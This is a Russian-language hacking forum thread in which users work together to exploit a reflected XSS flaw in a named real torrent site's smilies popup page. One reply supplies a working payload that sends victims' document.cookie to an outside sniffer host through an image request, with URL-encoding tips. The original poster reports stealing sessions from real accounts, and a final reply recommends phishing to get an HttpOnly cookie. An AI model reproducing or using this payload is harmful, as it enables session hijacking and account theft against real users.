нашол такую хсс при нажатие в правом углу на закрытие появляется алерт http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+document.cookie)+'&lang=ro где типерь запихнуть сылку сниффера помоги пожалуста http://hacker-lab.com/sniffer/images/251095_3.jpg
какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие. такого рода код: '+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+' не забудьте про URLEncode, плюсы в %2b, пробелы в +
Друг можно всю сылку и чтоб провериная была о то многие типа помоглали но ничево на снифере неприходило,спасибо
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro нехочет так
друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс http://incomas.md/shop/2015.jpg
друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс http://incomas.md/shop/2015.jpg
очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс http://incomas.md/shop/2015.jpg
Невозможно получить значение kogaionon_data, потому что javascript не имеет доступа к кукам, которые имеют флаг HttpOnly(передаётся в заголовках браузеру, но JS-ом их не выцепить) Юзай фишинг.